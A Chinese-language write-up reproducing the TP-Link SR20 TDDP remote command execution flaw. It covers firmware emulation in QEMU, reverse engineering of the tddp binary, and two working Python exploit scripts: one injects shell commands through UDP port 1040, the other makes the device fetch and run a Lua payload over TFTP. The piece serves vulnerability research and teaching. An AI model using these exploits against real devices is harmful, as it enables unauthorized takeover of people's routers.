TP-Link SR20 RCE漏洞

| 0 | 前言

TDDP协议(TP-LINK Device Debug Protocol) 是TP-LINK申请了专利的一种在UPD通信的基础上设计的协议,而Google著名安全专家Matthew GarrettTP-Link SR20设备上的TDDP协议文件中发现了一处可造成 “允许来自本地网络连接的任意命令执行”(RCE) 的漏洞.

UPD通信协议的设计目的:轻便快速不建立连接(不像TCP那样要三次握手)

| 1 | 固件下载&解包&qemu配置

下载地址 :

SR20(US)_V1_180518

解包

1
binwalk -e --preserve-symlinks tpra_sr20v1_us-up-ver1-2-1-P522_20180518-rel77140_2018-05-21_08.42.04.bin

qemu配置

由于本次的固件采用了后台服务监听,所以必须采用qemu的system仿真

我们首先需要从 Debian 官网 下载内核,磁盘文件及镜像文件:

vmlinuz-3.2.0-4-vexpress

initrd.img-3.2.0-4-vexpress

debian_wheezy_armhf_standard.qcow2

然后将这三个文件放在一个文件夹下,并使创建一个启动脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/bin/bash
# TAP接口配置
TAP_IF="tap0"
BR_IF="br0"

# 确保 tap0 存在,并添加进 br0
sudo ip tuntap add dev $TAP_IF mode tap
sudo ip link set $TAP_IF up
sudo brctl addif $BR_IF $TAP_IF

sudo qemu-system-arm \
    -M vexpress-a9 \
    -kernel vmlinuz-3.2.0-4-vexpress \
    -initrd initrd.img-3.2.0-4-vexpress \
    -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 \
    -append "root=/dev/mmcblk0p2 console=ttyAMA0" \
    -net nic \
    -net tap,ifname=tap0,script=no,downscript=no \
    -nographic

运行启动脚本后在qemu内查看是否能ping通8.8.8.8以及宿主机IP,如果能ping通说明配置完毕

最后我们使用scp命令将固件解包后的文件系统传送到qemu中,这个过程可能会有点漫长

| 2 | 二进制文件逆向

根据漏洞报告我们可以锁定/usr/bin/tddp这个二进制文件,将其拖入IDA中分析

1751949335311

main函数中包含了内存分配,释放函数以及操作函数(我将其命名为vuln)

1751949484209

进入其中可以发现,先是分配了一块较大的内存,后创建了一个套接字

我在讲机器出网orw的那篇文章中简单介绍过这几个函数,这详细说一说

socket(AF_INET, SOCK_DGRAM, 0);用于创建一个套接字空壳

  • AF_INET表示使用的协议,其中2代表使用 IPv4 协议
  • SOCK_DGRAM表示数据报模式,其中2代表UDP 数据报模式
  • 最后一个0代表自动匹配协议号

int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);把一个 socket 和一个本地的 IP 地址 + 端口 绑定在一起,让操作系统知道这个 socket 的作用是“负责监听这个端口”

  • int sockfd表示指定的套接字句柄
  • const struct sockaddr *addr是个结构体
1
2
3
4
struct sockaddr {
    sa_family_t sa_family;   // 地址族(AF_INET / AF_INET6 / AF_UNIX ...)
    char        sa_data[14]; // 装 IP 和端口的原始数据(但不可直接操作)
};
  • socklen_t addrlen表示二参结构体的大小

通过以上socketbind操作,实现了创建一个socket绑定到到1040端口,并对本地端口1040的监听

当以上函数正常执行后,执行流会来到sub_16418

1751950365395

其中调用的recvfrom函数

recvfrom() 是一个 用于接收 UDP 数据包 的系统调用,它不仅接收数据,还能保存数据的来源

recvfrom(int sockfd,void *buf,size_t len,int flags,struct sockaddr *src_addr,socklen_t *addrlen);

  • int sockfd仍然是套接字句柄
  • void* buf为接受数据的缓冲区大小,这里便是调用calloc分配的大内存块的起始地址偏移45083处开始存储接收到的数据
  • size_t len为最大接受数据的长度
  • int flags一般为0
  • struct sockaddr *src_addr用于存储对端地址,也就是数据的来源
  • socklen_t *addrlen指向的内存中存储了上个参数的结构体大小

1751950866703

随后对接收到的数据进行第一字节检查是否为1,然后将对齐地址存放在a1偏移为0x20的地址,选择是否进入sub_15E74

这里涉及到了TDDP包的格式,可以看到报头的首项为版本号,这里指定为1

1751950946193

进入后根据漏洞报告继续寻找31处的逻辑

1751951017944

可以看到这里的cmd,v12为超大内存块的起始地址位于0xb01b偏移的位置,也就是接收到的数据的起始地址

1751951071388

检查版本号为1后,将cmdv13向高地址移动12字节,也就来到了TDDP报头的Digest字段的起始地址

1751951598545

然后是使用sscanf继续正则表达式过滤,将cmd中位于;前的字符串放入sss中,然后将sssv15格式化入字符串,调用System函数,进入其中我们可以看到这里使用了execve(“/bin/sh”,”sh,-c”,0).说明我们可以在此注入参数

1751951723572

我们退出System继续往下看,可以看到对sss名文件的下载与运行,且都没有对sss进行任何检查

1751951833152

| 3 | 利用手法

我们从以上逆向可以推断出两种利用手法

但在注入之前,我们还需要将进行chroot操作,保证命令执行使用的根目录位于文件系统内

1
2
3
4
5
6
7
8
cd squashfs-root
cp /bin/nc.traditional ./bin
mv ./bin/nc.traditional ./bin/nc
cp /lib/arm-linux-gnueabihf/libc.so.6 ./lib/arm-linux-gnueabihf
cp /lib/ld-linux-armhf.so.3 ./lib
mount -o bind /dev ./dev
mount -t proc /proc ./proc
chroot . sh

1.直接注入execve()

因为sscanf只过滤了;,我们还有别的手段对命令进行分割,比如|

1
2
3
4
5
6
7
8
9
10
11
12
from socket import *
import sys
from pwn import *
from socket import socket
tddp_port = 1040
cmd=input("please input command")
ip = "192.168.52.133"# (QEMU虚拟机的IP)
s_send = socket(AF_INET, SOCK_DGRAM, 0)
payload = (p8(1)+p8(0x31)).ljust(12, b'\x00')
payload += f"| {cmd};zer00ne".encode()
s_send.sendto(payload, (ip, tddp_port))
s_send.close()

2.文件上传

System的预期作用为从我们的宿主机下载对应文件名的文件:tftp -gr [file_name] [IP]

IP端口的atftpd的根目录中下载名为file_name的文件,进行完System调用后会打开我们输入的文件名并运行

1751957195346

下载的路径我们可以使用sudo ps -ef | grep tftp查看

1
2
3
zer00ne@zer00ne:~/Desktop/cve_review/new$ sudo ps -ef | grep tftp
atftpd      5928       1  0 14:41 ?        00:00:00 /usr/sbin/in.tftpd --tftpd-timeout 300 --retry-timeout 5 --mcast-port 1758 --mcast-addr 239.239.239.0-255 --mcast-ttl 1 --maxthread 100 --verbose=5 /tftpboot
zer00ne     5948    3506  0 14:41 pts/2    00:00:00 grep --color=auto tftp

从这我们可以看到atftpd的根目录在/tftpboot中,也就是我们要把需要上传的文件存放在这个目录中

首先使用lua写一个rce脚本,cmd为任意命令

1
2
3
function config_test(config)
    os.execute({cmd})
end

然后exp脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
from socket import *
import sys
from pwn import *
from socket import socket
tddp_port = 1040
ip = "192.168.52.133"# (QEMU虚拟机的IP)
#command = sys.argv[1]

s_send = socket(AF_INET, SOCK_DGRAM, 0)
payload = (p8(1)+p8(0x31)).ljust(12, b'\x00')
payload += f"/payload;zer00ne".encode()
s_send.sendto(payload, (ip, tddp_port))
s_send.close()

可以看到我们成功RCE

1751957298111